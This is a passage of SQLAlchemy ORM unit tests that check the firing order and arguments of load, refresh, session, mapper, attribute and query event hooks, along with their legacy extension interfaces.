        def canary2(obj, context, props):
            obj.name = 'refreshed name!'
        sess = Session()
        u1 = User(name='u1')
        sess.add(u1)
        sess.commit()
        sess.close()
        u1 = sess.query(User).first()
        eq_(
            attributes.get_history(u1, "name"),
            ((), ['new name!'], ())
        )
        # the mutation made inside the 'load' hook does not mark the
        # object dirty
        assert "name" not in attributes.instance_state(u1).committed_state
        assert u1 not in sess.dirty
        sess.expire(u1)
        u1.id
        eq_(
            attributes.get_history(u1, "name"),
            ((), ['refreshed name!'], ())
        )
        # the mutation made inside the 'refresh' hook does — the object
        # is in sess.dirty here
        assert "name" not in attributes.instance_state(u1).committed_state
        assert u1 in sess.dirty
    def test_repeated_rows(self):
        # the second occurrence of the same row in a result refreshes
        User = self.classes.User
        canary = self._fixture()
        sess = Session()
        u1 = User(name='u1')
        sess.add(u1)
        sess.commit()
        sess.query(User).union_all(sess.query(User)).all()
        eq_(canary, [('refresh', set(['id', 'name']))])
    def test_via_refresh_state(self):
        # touching an attribute of an expired (post-commit) object
        # triggers 'refresh'
        User = self.classes.User
        canary = self._fixture()
        sess = Session()
        u1 = User(name='u1')
        sess.add(u1)
        sess.commit()
        u1.name
        eq_(canary, [('refresh', set(['id', 'name']))])
    def test_was_expired(self):
        User = self.classes.User
        canary = self._fixture()
        sess = Session()
        u1 = User(name='u1')
        sess.add(u1)
        sess.flush()
        sess.expire(u1)
        sess.query(User).first()
        eq_(canary, [('refresh', set(['id', 'name']))])
    def test_was_expired_via_commit(self):
        User = self.classes.User
        canary = self._fixture()
        sess = Session()
        u1 = User(name='u1')
        sess.add(u1)
        sess.commit()
        sess.query(User).first()
        eq_(canary, [('refresh', set(['id', 'name']))])
    def test_was_expired_attrs(self):
        # only the expired attributes are reported in the event
        User = self.classes.User
        canary = self._fixture()
        sess = Session()
        u1 = User(name='u1')
        sess.add(u1)
        sess.flush()
        sess.expire(u1, ['name'])
        sess.query(User).first()
        eq_(canary, [('refresh', set(['name']))])
    def test_populate_existing(self):
        # populate_existing() emits 'refresh' with attrs=None
        User = self.classes.User
        canary = self._fixture()
        sess = Session()
        u1 = User(name='u1')
        sess.add(u1)
        sess.commit()
        sess.query(User).populate_existing().first()
        eq_(canary, [('refresh', None)])
class SessionEventsTest(_RemoveListeners, _fixtures.FixtureTest):
    """Exercise Session-level event hooks: the targets they can be listened
    on (Session class, sessionmaker, scoped_session) and the exact order in
    which they fire across flush/commit/rollback and bulk operations.
    """
    run_inserts = None
    def test_class_listen(self):
        # listening on the Session class itself affects instances created
        # afterwards
        def my_listener(*arg, **kw):
            pass
        event.listen(Session, 'before_flush', my_listener)
        s = Session()
        assert my_listener in s.dispatch.before_flush
    def test_sessionmaker_listen(self):
        """test that listen can be applied to individual
        scoped_session() classes."""
        def my_listener_one(*arg, **kw):
            pass
        def my_listener_two(*arg, **kw):
            pass
        S1 = sessionmaker()
        S2 = sessionmaker()
        event.listen(Session, 'before_flush', my_listener_one)
        event.listen(S1, 'before_flush', my_listener_two)
        s1 = S1()
        assert my_listener_one in s1.dispatch.before_flush
        assert my_listener_two in s1.dispatch.before_flush
        # listeners on S1 do not leak to the sibling factory S2
        s2 = S2()
        assert my_listener_one in s2.dispatch.before_flush
        assert my_listener_two not in s2.dispatch.before_flush
    def test_scoped_session_invalid_callable(self):
        # a scoped_session whose factory is a plain callable (not a
        # sessionmaker) is rejected as an event target
        from sqlalchemy.orm import scoped_session
        def my_listener_one(*arg, **kw):
            pass
        scope = scoped_session(lambda: Session())
        assert_raises_message(
            sa.exc.ArgumentError,
            "Session event listen on a scoped_session requires that its "
            "creation callable is associated with the Session class.",
            event.listen, scope, "before_flush", my_listener_one
        )
    def test_scoped_session_invalid_class(self):
        from sqlalchemy.orm import scoped_session
        def my_listener_one(*arg, **kw):
            pass
        class NotASession(object):
            def __call__(self):
                return Session()
        scope = scoped_session(NotASession)
        assert_raises_message(
            sa.exc.ArgumentError,
            "Session event listen on a scoped_session requires that its "
            "creation callable is associated with the Session class.",
            event.listen, scope, "before_flush", my_listener_one
        )
    def test_scoped_session_listen(self):
        from sqlalchemy.orm import scoped_session
        def my_listener_one(*arg, **kw):
            pass
        scope = scoped_session(sessionmaker())
        event.listen(scope, "before_flush", my_listener_one)
        assert my_listener_one in scope().dispatch.before_flush
    def _listener_fixture(self, **kw):
        # Returns (session, canary): canary records the name of every
        # session event fired, in order.
        canary = []
        def listener(name):
            def go(*arg, **kw):
                canary.append(name)
            return go
        sess = Session(**kw)
        for evt in [
            'after_transaction_create',
            'after_transaction_end',
            'before_commit',
            'after_commit',
            'after_rollback',
            'after_soft_rollback',
            'before_flush',
            'after_flush',
            'after_flush_postexec',
            'after_begin',
            'before_attach',
            'after_attach',
            'after_bulk_update',
            'after_bulk_delete'
        ]:
            event.listen(sess, evt, listener(evt))
        return sess, canary
    def test_flush_autocommit_hook(self):
        User, users = self.classes.User, self.tables.users
        mapper(User, users)
        sess, canary = self._listener_fixture(
            autoflush=False,
            autocommit=True, expire_on_commit=False)
        u = User(name='u1')
        sess.add(u)
        sess.flush()
        # in autocommit mode, flush() itself runs the commit hooks
        eq_(
            canary,
            ['before_attach', 'after_attach', 'before_flush',
             'after_transaction_create', 'after_begin',
             'after_flush', 'after_flush_postexec',
             'before_commit', 'after_commit', 'after_transaction_end']
        )
    def test_rollback_hook(self):
        User, users = self.classes.User, self.tables.users
        sess, canary = self._listener_fixture()
        mapper(User, users)
        u = User(name='u1', id=1)
        sess.add(u)
        sess.commit()
        # a second insert with the same primary key fails at flush time,
        # producing the rollback sequence in the assertion below
        u2 = User(name='u1', id=1)
        sess.add(u2)
        assert_raises(
            sa.orm.exc.FlushError,
            sess.commit
        )
        sess.rollback()
        eq_(canary,
            ['before_attach', 'after_attach', 'before_commit', 'before_flush',
             'after_transaction_create', 'after_begin', 'after_flush',
             'after_flush_postexec', 'after_transaction_end', 'after_commit',
             'after_transaction_end', 'after_transaction_create',
             'before_attach', 'after_attach', 'before_commit',
             'before_flush', 'after_transaction_create', 'after_begin',
             'after_rollback',
             'after_transaction_end',
             'after_soft_rollback', 'after_transaction_end',
             'after_transaction_create',
             'after_soft_rollback'])
    def test_can_use_session_in_outer_rollback_hook(self):
        User, users = self.classes.User, self.tables.users
        mapper(User, users)
        sess = Session()
        assertions = []
        # the hook runs both for the inner (failed flush) and the outer
        # rollback; only the outer one sees session.is_active True, where
        # u has been expired ('name' no longer loaded) yet refreshable
        @event.listens_for(sess, "after_soft_rollback")
        def do_something(session, previous_transaction):
            if session.is_active:
                assertions.append('name' not in u.__dict__)
                assertions.append(u.name == 'u1')
        u = User(name='u1', id=1)
        sess.add(u)
        sess.commit()
        u2 = User(name='u1', id=1)
        sess.add(u2)
        assert_raises(
            sa.orm.exc.FlushError,
            sess.commit
        )
        sess.rollback()
        eq_(assertions, [True, True])
    def test_flush_noautocommit_hook(self):
        User, users = self.classes.User, self.tables.users
        sess, canary = self._listener_fixture()
        mapper(User, users)
        u = User(name='u1')
        sess.add(u)
        sess.flush()
        # no commit hooks here; the flush leaves the transaction open
        eq_(canary, ['before_attach', 'after_attach', 'before_flush',
                     'after_transaction_create', 'after_begin',
                     'after_flush', 'after_flush_postexec',
                     'after_transaction_end'])
    def test_flush_in_commit_hook(self):
        User, users = self.classes.User, self.tables.users
        sess, canary = self._listener_fixture()
        mapper(User, users)
        u = User(name='u1')
        sess.add(u)
        sess.flush()
        canary[:] = []
        u.name = 'ed'
        sess.commit()
        eq_(canary, ['before_commit', 'before_flush',
                     'after_transaction_create', 'after_flush',
                     'after_flush_postexec',
                     'after_transaction_end',
                     'after_commit',
                     'after_transaction_end', 'after_transaction_create', ])
    def test_state_before_attach(self):
        # inside before_attach, the instance is not yet part of the session
        User, users = self.classes.User, self.tables.users
        sess = Session()
        @event.listens_for(sess, "before_attach")
        def listener(session, inst):
            state = attributes.instance_state(inst)
            if state.key:
                assert state.key not in session.identity_map
            else:
                assert inst not in session.new
        mapper(User, users)
        u = User(name='u1')
        sess.add(u)
        sess.flush()
        sess.expunge(u)
        sess.add(u)
    def test_state_after_attach(self):
        # inside after_attach, the instance is already part of the session
        User, users = self.classes.User, self.tables.users
        sess = Session()
        @event.listens_for(sess, "after_attach")
        def listener(session, inst):
            state = attributes.instance_state(inst)
            if state.key:
                assert session.identity_map[state.key] is inst
            else:
                assert inst in session.new
        mapper(User, users)
        u = User(name='u1')
        sess.add(u)
        sess.flush()
        sess.expunge(u)
        sess.add(u)
    def test_standalone_on_commit_hook(self):
        # committing with nothing to flush still fires the commit hooks
        sess, canary = self._listener_fixture()
        sess.commit()
        eq_(canary, ['before_commit', 'after_commit',
                     'after_transaction_end',
                     'after_transaction_create'])
    def test_on_bulk_update_hook(self):
        User, users = self.classes.User, self.tables.users
        sess = Session()
        canary = Mock()
        event.listen(sess, "after_begin", canary.after_begin)
        event.listen(sess, "after_bulk_update", canary.after_bulk_update)
        # legacy four-argument listener signature must still be adapted
        def legacy(ses, qry, ctx, res):
            canary.after_bulk_update_legacy(ses, qry, ctx, res)
        event.listen(sess, "after_bulk_update", legacy)
        mapper(User, users)
        sess.query(User).update({'name': 'foo'})
        eq_(
            canary.after_begin.call_count,
            1
        )
        eq_(
            canary.after_bulk_update.call_count,
            1
        )
        # the modern listener receives a single "update context" object
        upd = canary.after_bulk_update.mock_calls[0][1][0]
        eq_(
            upd.session,
            sess
        )
        eq_(
            canary.after_bulk_update_legacy.mock_calls,
            [call(sess, upd.query, upd.context, upd.result)]
        )
    def test_on_bulk_delete_hook(self):
        User, users = self.classes.User, self.tables.users
        sess = Session()
        canary = Mock()
        event.listen(sess, "after_begin", canary.after_begin)
        event.listen(sess, "after_bulk_delete", canary.after_bulk_delete)
        # legacy four-argument listener signature must still be adapted
        def legacy(ses, qry, ctx, res):
            canary.after_bulk_delete_legacy(ses, qry, ctx, res)
        event.listen(sess, "after_bulk_delete", legacy)
        mapper(User, users)
        sess.query(User).delete()
        eq_(
            canary.after_begin.call_count,
            1
        )
        eq_(
            canary.after_bulk_delete.call_count,
            1
        )
        upd = canary.after_bulk_delete.mock_calls[0][1][0]
        eq_(
            upd.session,
            sess
        )
        eq_(
            canary.after_bulk_delete_legacy.mock_calls,
            [call(sess, upd.query, upd.context, upd.result)]
        )
    def test_connection_emits_after_begin(self):
        sess, canary = self._listener_fixture(bind=testing.db)
        sess.connection()
        eq_(canary, ['after_begin'])
        sess.close()
    def test_reentrant_flush(self):
        # flushing from inside before_flush is rejected
        users, User = self.tables.users, self.classes.User
        mapper(User, users)
        def before_flush(session, flush_context, objects):
            session.flush()
        sess = Session()
        event.listen(sess, 'before_flush', before_flush)
        sess.add(User(name='foo'))
        assert_raises_message(sa.exc.InvalidRequestError,
                              'already flushing', sess.flush)
    def test_before_flush_affects_flush_plan(self):
        # objects added/deleted inside before_flush become part of the
        # same flush
        users, User = self.tables.users, self.classes.User
        mapper(User, users)
        def before_flush(session, flush_context, objects):
            for obj in list(session.new) + list(session.dirty):
                if isinstance(obj, User):
                    session.add(User(name='another %s' % obj.name))
            for obj in list(session.deleted):
                if isinstance(obj, User):
                    x = session.query(User).filter(
                        User.name == 'another %s' % obj.name).one()
                    session.delete(x)
        sess = Session()
        event.listen(sess, 'before_flush', before_flush)
        u = User(name='u1')
        sess.add(u)
        sess.flush()
        eq_(sess.query(User).order_by(User.name).all(),
            [
                User(name='another u1'),
                User(name='u1')
            ]
        )
        # a no-op flush adds nothing further
        sess.flush()
        eq_(sess.query(User).order_by(User.name).all(),
            [
                User(name='another u1'),
                User(name='u1')
            ]
        )
        u.name = 'u2'
        sess.flush()
        eq_(sess.query(User).order_by(User.name).all(),
            [
                User(name='another u1'),
                User(name='another u2'),
                User(name='u2')
            ]
        )
        sess.delete(u)
        sess.flush()
        eq_(sess.query(User).order_by(User.name).all(),
            [
                User(name='another u1'),
            ]
        )
    def test_before_flush_affects_dirty(self):
        # attribute changes made inside before_flush are flushed too
        users, User = self.tables.users, self.classes.User
        mapper(User, users)
        def before_flush(session, flush_context, objects):
            for obj in list(session.identity_map.values()):
                obj.name += " modified"
        sess = Session(autoflush=True)
        event.listen(sess, 'before_flush', before_flush)
        u = User(name='u1')
        sess.add(u)
        sess.flush()
        eq_(sess.query(User).order_by(User.name).all(),
            [User(name='u1')]
        )
        sess.add(User(name='u2'))
        sess.flush()
        sess.expunge_all()
        eq_(sess.query(User).order_by(User.name).all(),
            [
                User(name='u1 modified'),
                User(name='u2')
            ]
        )
class MapperExtensionTest(_fixtures.FixtureTest):
    """Superseded by MapperEventsTest - test backwards
    compatibility of MapperExtension."""
    run_inserts = None
    def extension(self):
        # Returns (Ext, methods): a MapperExtension subclass whose hooks
        # each record their own name into the shared 'methods' list.
        methods = []
        class Ext(sa.orm.MapperExtension):
            def instrument_class(self, mapper, cls):
                methods.append('instrument_class')
                return sa.orm.EXT_CONTINUE
            def init_instance(
                    self, mapper, class_, oldinit, instance, args, kwargs):
                methods.append('init_instance')
                return sa.orm.EXT_CONTINUE
            def init_failed(
                    self, mapper, class_, oldinit, instance, args, kwargs):
                methods.append('init_failed')
                return sa.orm.EXT_CONTINUE
            def reconstruct_instance(self, mapper, instance):
                methods.append('reconstruct_instance')
                return sa.orm.EXT_CONTINUE
            def before_insert(self, mapper, connection, instance):
                methods.append('before_insert')
                return sa.orm.EXT_CONTINUE
            def after_insert(self, mapper, connection, instance):
                methods.append('after_insert')
                return sa.orm.EXT_CONTINUE
            def before_update(self, mapper, connection, instance):
                methods.append('before_update')
                return sa.orm.EXT_CONTINUE
            def after_update(self, mapper, connection, instance):
                methods.append('after_update')
                return sa.orm.EXT_CONTINUE
            def before_delete(self, mapper, connection, instance):
                methods.append('before_delete')
                return sa.orm.EXT_CONTINUE
            def after_delete(self, mapper, connection, instance):
                methods.append('after_delete')
                return sa.orm.EXT_CONTINUE
        return Ext, methods
    def test_basic(self):
        """test that common user-defined methods get called."""
        User, users = self.classes.User, self.tables.users
        Ext, methods = self.extension()
        mapper(User, users, extension=Ext())
        sess = create_session()
        u = User(name='u1')
        sess.add(u)
        sess.flush()
        u = sess.query(User).populate_existing().get(u.id)
        sess.expunge_all()
        u = sess.query(User).get(u.id)
        u.name = 'u1 changed'
        sess.flush()
        sess.delete(u)
        sess.flush()
        eq_(methods,
            ['instrument_class', 'init_instance', 'before_insert',
             'after_insert',
             'reconstruct_instance',
             'before_update', 'after_update', 'before_delete', 'after_delete'])
    def test_inheritance(self):
        # the extension on the base mapper is adapted onto the inheriting
        # mapper as well; instrument_class fires once per mapper
        users, addresses, User = (self.tables.users,
                                  self.tables.addresses,
                                  self.classes.User)
        Ext, methods = self.extension()
        class AdminUser(User):
            pass
        mapper(User, users, extension=Ext())
        mapper(AdminUser, addresses, inherits=User,
               properties={'address_id': addresses.c.id})
        sess = create_session()
        am = AdminUser(name='au1', email_address='au1@e1')
        sess.add(am)
        sess.flush()
        am = sess.query(AdminUser).populate_existing().get(am.id)
        sess.expunge_all()
        am = sess.query(AdminUser).get(am.id)
        am.name = 'au1 changed'
        sess.flush()
        sess.delete(am)
        sess.flush()
        eq_(methods,
            ['instrument_class', 'instrument_class', 'init_instance',
             'before_insert', 'after_insert',
             'reconstruct_instance',
             'before_update', 'after_update', 'before_delete',
             'after_delete'])
    def test_before_after_only_collection(self):
        """before_update is called on parent for collection modifications,
        after_update is called even if no columns were updated.
        """
        keywords, items, item_keywords, Keyword, Item = (
            self.tables.keywords,
            self.tables.items,
            self.tables.item_keywords,
            self.classes.Keyword,
            self.classes.Item)
        Ext1, methods1 = self.extension()
        Ext2, methods2 = self.extension()
        mapper(Item, items, extension=Ext1(), properties={
            'keywords': relationship(Keyword, secondary=item_keywords)})
        mapper(Keyword, keywords, extension=Ext2())
        sess = create_session()
        i1 = Item(description="i1")
        k1 = Keyword(name="k1")
        sess.add(i1)
        sess.add(k1)
        sess.flush()
        eq_(methods1,
            ['instrument_class', 'init_instance',
             'before_insert', 'after_insert'])
        eq_(methods2,
            ['instrument_class', 'init_instance',
             'before_insert', 'after_insert'])
        del methods1[:]
        del methods2[:]
        # collection-only change: parent Item gets update hooks, the
        # child Keyword gets none
        i1.keywords.append(k1)
        sess.flush()
        eq_(methods1, ['before_update', 'after_update'])
        eq_(methods2, [])
    def test_inheritance_with_dupes(self):
        """Inheritance with the same extension instance on both mappers."""
        users, addresses, User = (self.tables.users,
                                  self.tables.addresses,
                                  self.classes.User)
        Ext, methods = self.extension()
        class AdminUser(User):
            pass
        ext = Ext()
        mapper(User, users, extension=ext)
        mapper(AdminUser, addresses, inherits=User, extension=ext,
               properties={'address_id': addresses.c.id})
        sess = create_session()
        am = AdminUser(name="au1", email_address="au1@e1")
        sess.add(am)
        sess.flush()
        am = sess.query(AdminUser).populate_existing().get(am.id)
        sess.expunge_all()
        am = sess.query(AdminUser).get(am.id)
        am.name = 'au1 changed'
        sess.flush()
        sess.delete(am)
        sess.flush()
        # same sequence as test_inheritance: the duplicate extension is
        # not invoked twice per hook
        eq_(methods,
            ['instrument_class', 'instrument_class', 'init_instance',
             'before_insert', 'after_insert',
             'reconstruct_instance',
             'before_update', 'after_update', 'before_delete',
             'after_delete'])
    def test_unnecessary_methods_not_evented(self):
        users = self.tables.users
        class MyExtension(sa.orm.MapperExtension):
            def before_insert(self, mapper, connection, instance):
                pass
        class Foo(object):
            pass
        m = mapper(Foo, users, extension=MyExtension())
        # only the hook actually overridden is adapted into a listener
        assert not m.class_manager.dispatch.load
        assert not m.dispatch.before_update
        assert len(m.dispatch.before_insert) == 1
class AttributeExtensionTest(fixtures.MappedTest):
    """Test the legacy AttributeExtension interface for attribute 'set'
    events, including override behavior along an inheritance hierarchy.
    """
    @classmethod
    def define_tables(cls, metadata):
        Table('t1',
              metadata,
              Column('id', Integer, primary_key=True),
              Column('type', String(40)),
              Column('data', String(50))
              )
    def test_cascading_extensions(self):
        t1 = self.tables.t1
        ext_msg = []
        class Ex1(sa.orm.AttributeExtension):
            def set(self, state, value, oldvalue, initiator):
                ext_msg.append("Ex1 %r" % value)
                return "ex1" + value
        class Ex2(sa.orm.AttributeExtension):
            def set(self, state, value, oldvalue, initiator):
                ext_msg.append("Ex2 %r" % value)
                return "ex2" + value
        class A(fixtures.BasicEntity):
            pass
        class B(A):
            pass
        class C(B):
            pass
        mapper(
            A, t1, polymorphic_on=t1.c.type, polymorphic_identity='a',
            properties={
                'data': column_property(t1.c.data, extension=Ex1())
            }
        )
        mapper(B, polymorphic_identity='b', inherits=A)
        # C re-declares 'data' with its own extension, replacing Ex1
        mapper(C, polymorphic_identity='c', inherits=B, properties={
            'data': column_property(t1.c.data, extension=Ex2())
        })
        a1 = A(data='a1')
        b1 = B(data='b1')
        c1 = C(data='c1')
        # A and B see Ex1's transformed value; C sees Ex2's
        eq_(a1.data, 'ex1a1')
        eq_(b1.data, 'ex1b1')
        eq_(c1.data, 'ex2c1')
        a1.data = 'a2'
        b1.data = 'b2'
        c1.data = 'c2'
        eq_(a1.data, 'ex1a2')
        eq_(b1.data, 'ex1b2')
        eq_(c1.data, 'ex2c2')
        eq_(ext_msg, ["Ex1 'a1'", "Ex1 'b1'", "Ex2 'c1'",
                      "Ex1 'a2'", "Ex1 'b2'", "Ex2 'c2'"])
class SessionExtensionTest(_fixtures.FixtureTest):
    """Test the legacy SessionExtension interface (superseded by
    session-level events)."""
    run_inserts = None
    def test_extension(self):
        User, users = self.classes.User, self.tables.users
        mapper(User, users)
        log = []
        class MyExt(sa.orm.session.SessionExtension):
            def before_commit(self, session):
                log.append('before_commit')
            def after_commit(self, session):
                log.append('after_commit')
            def after_rollback(self, session):
                log.append('after_rollback')
            def before_flush(self, session, flush_context, objects):
                log.append('before_flush')
            def after_flush(self, session, flush_context):
                log.append('after_flush')
            def after_flush_postexec(self, session, flush_context):
                log.append('after_flush_postexec')
            def after_begin(self, session, transaction, connection):
                log.append('after_begin')
            def after_attach(self, session, instance):
                log.append('after_attach')
            def after_bulk_update(
                self,
                session, query, query_context, result
            ):
                log.append('after_bulk_update')
            def after_bulk_delete(
                self,
                session, query, query_context, result
            ):
                log.append('after_bulk_delete')
        sess = create_session(extension=MyExt())
        u = User(name='u1')
        sess.add(u)
        sess.flush()
        # default create_session() is autocommit: flush() includes the
        # commit hooks
        assert log == [
            'after_attach',
            'before_flush',
            'after_begin',
            'after_flush',
            'after_flush_postexec',
            'before_commit',
            'after_commit',
        ]
        log = []
        sess = create_session(autocommit=False, extension=MyExt())
        u = User(name='u1')
        sess.add(u)
        sess.flush()
        assert log == ['after_attach', 'before_flush', 'after_begin',
                       'after_flush', 'after_flush_postexec']
        log = []
        u.name = 'ed'
        sess.commit()
        assert log == ['before_commit', 'before_flush', 'after_flush',
                       'after_flush_postexec', 'after_commit']
        log = []
        # nothing dirty: commit fires only the commit hooks
        sess.commit()
        assert log == ['before_commit', 'after_commit']
        log = []
        sess.query(User).delete()
        assert log == ['after_begin', 'after_bulk_delete']
        log = []
        sess.query(User).update({'name': 'foo'})
        assert log == ['after_bulk_update']
        log = []
        sess = create_session(autocommit=False, extension=MyExt(),
                              bind=testing.db)
        sess.connection()
        assert log == ['after_begin']
        sess.close()
    def test_multiple_extensions(self):
        User, users = self.classes.User, self.tables.users
        log = []
        class MyExt1(sa.orm.session.SessionExtension):
            def before_commit(self, session):
                log.append('before_commit_one')
        class MyExt2(sa.orm.session.SessionExtension):
            def before_commit(self, session):
                log.append('before_commit_two')
        mapper(User, users)
        sess = create_session(extension=[MyExt1(), MyExt2()])
        u = User(name='u1')
        sess.add(u)
        sess.flush()
        # extensions fire in the order they were supplied
        assert log == [
            'before_commit_one',
            'before_commit_two',
        ]
    def test_unnecessary_methods_not_evented(self):
        class MyExtension(sa.orm.session.SessionExtension):
            def before_commit(self, session):
                pass
        s = Session(extension=MyExtension())
        # only the hook actually overridden is adapted into a listener
        assert not s.dispatch.after_commit
        assert len(s.dispatch.before_commit) == 1
class QueryEventsTest(
        _RemoveListeners, _fixtures.FixtureTest, AssertsCompiledSQL):
    """Tests for the Query-level "before_compile" event hook, which may
    rewrite the query (with retval=True) before it is compiled."""
    __dialect__ = 'default'
    @classmethod
    def setup_mappers(cls):
        mapper(cls.classes.User, cls.tables.users)
    def test_before_compile(self):
        user_cls = self.classes.User
        @event.listens_for(query.Query, "before_compile", retval=True)
        def exclude_deleted(q):
            # append an extra criterion to any query selecting User rows
            for desc in q.column_descriptions:
                if desc['type'] is user_cls:
                    q = q.filter(desc['expr'].id != 10)
            return q
        session = Session()
        stmt = session.query(user_cls).filter_by(id=7)
        self.assert_compile(
            stmt,
            "SELECT users.id AS users_id, users.name AS users_name "
            "FROM users "
            "WHERE users.id = :id_1 AND users.id != :id_2",
            checkparams={'id_2': 10, 'id_1': 7}
        )
    def test_alters_entities(self):
        user_cls = self.classes.User
        @event.listens_for(query.Query, "before_compile", retval=True)
        def add_name_column(q):
            # the hook may add whole new result columns to the query
            return q.add_columns(user_cls.name)
        session = Session()
        stmt = session.query(user_cls.id).filter_by(id=7)
        self.assert_compile(
            stmt,
            "SELECT users.id AS users_id, users.name AS users_name "
            "FROM users "
            "WHERE users.id = :id_1",
            checkparams={'id_1': 7}
        )
        eq_(
            stmt.all(),
            [(7, 'jack')]
        )
class RefreshFlushInReturningTest(fixtures.MappedTest):
    """test [ticket:3427].
    this is a rework of the test for [ticket:3167] stated
    in test_unitofworkv2, which tests that returning doesn't trigger
    attribute events; the test here is *reversed* so that we test that
    it *does* trigger the new refresh_flush event.
    """
    __backend__ = True
    @classmethod
    def define_tables(cls, metadata):
        Table(
            'test', metadata,
            Column('id', Integer, primary_key=True,
                   test_needs_autoincrement=True),
            # one column with a Python-side default ("prefetch") and one
            # with a server default (fetched via RETURNING when available)
            Column('prefetch_val', Integer, default=5),
            Column('returning_val', Integer, server_default="5")
        )
    @classmethod
    def setup_classes(cls):
        class Thing(cls.Basic):
            pass
    @classmethod
    def setup_mappers(cls):
        Thing = cls.classes.Thing
        # eager_defaults=True so that the server default is fetched as
        # part of the flush, firing refresh_flush
        mapper(Thing, cls.tables.test, eager_defaults=True)
    def test_no_attr_events_flush(self):
        Thing = self.classes.Thing
        mock = Mock()
        event.listen(Thing, "refresh_flush", mock)
        t1 = Thing()
        s = Session()
        s.add(t1)
        s.flush()
        if testing.requires.returning.enabled:
            # ordering is deterministic in this test b.c. the routine
            # appends the "returning" params before the "prefetch"
            # ones. if there were more than one attribute in each category,
            # then we'd have hash order issues.
            eq_(
                mock.mock_calls,
                [call(t1, ANY, ['returning_val', 'prefetch_val'])]
            )
        else:
            eq_(
                mock.mock_calls,
                [call(t1, ANY, ['prefetch_val'])]
            )
        eq_(t1.id, 1)
        eq_(t1.prefetch_val, 5)
        eq_(t1.returning_val, 5)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.